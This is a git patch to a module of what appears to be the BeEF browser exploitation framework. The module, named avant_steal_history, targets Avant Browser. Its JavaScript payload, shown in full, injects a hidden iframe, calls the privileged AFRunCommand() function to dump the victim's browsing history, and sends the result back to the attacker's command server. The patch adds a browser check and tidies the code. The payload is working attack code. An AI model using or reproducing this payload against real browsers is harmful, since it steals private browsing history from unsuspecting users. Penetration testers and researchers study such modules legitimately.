From 7fdfcc3ef0bdac7ec0d0563e78b863c81ac86bf8 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 2 Jun 2013 03:19:05 +0930 Subject: [PATCH] Add `beef.browser.isA()` to avant_steal_history module Part of issue #774 --- .../browser/avant_steal_history/command.js | 38 +++++++++---------- .../browser/avant_steal_history/config.yaml | 4 +- 2 files changed, 19 insertions(+), 23 deletions(-) diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js index 6eb89b905..faefeaf2b 100644 --- a/modules/browser/avant_steal_history/command.js +++ b/modules/browser/avant_steal_history/command.js @@ -15,37 +15,33 @@ // beef.execute(function() { - + if (!beef.browser.isA()) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser."); + return; + } var avant_iframe = document.createElement("iframe"); //var avant_iframe = beef.dom.createInvisibleIframe(); - avant_iframe.setAttribute('src', "browser:home"); - avant_iframe.setAttribute('name','test2'); - avant_iframe.setAttribute('width','0'); - avant_iframe.setAttribute('heigth','0'); + avant_iframe.setAttribute('src', 'browser:home'); + avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>'); + avant_iframe.setAttribute('width', '0'); + avant_iframe.setAttribute('heigth', '0'); avant_iframe.setAttribute('scrolling','no'); + avant_iframe.setAttribute('style', 'display:none'); document.body.appendChild(avant_iframe); var vstr = {value: ""}; - if(window['test2'].navigator) { - //This works if FF is the rendering engine - window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr); - beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value); - + if (window['avant_history_<%= @command_id %>'].navigator) { + //This works if FF is the rendering engine + window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value); + } else { + // this works if Chrome is the rendering engine + //window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox."); } - else { - // this works if Chrome is the rendering engine - //window['test2'].AFRunCommand(60003, vstr); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox"); - - } - - - - - }); diff --git a/modules/browser/avant_steal_history/config.yaml b/modules/browser/avant_steal_history/config.yaml index ab161494f..bace4b5c0 100644 --- a/modules/browser/avant_steal_history/config.yaml +++ b/modules/browser/avant_steal_history/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "Browser" name: "Get Visited URLs (Avant Browser)" - description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history." + description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.

Note: Avant Browser in Firefox engine mode only." authors: ["Roberto Suggi Liverani"] target: - working: ["ALL"] + working: ["FF"]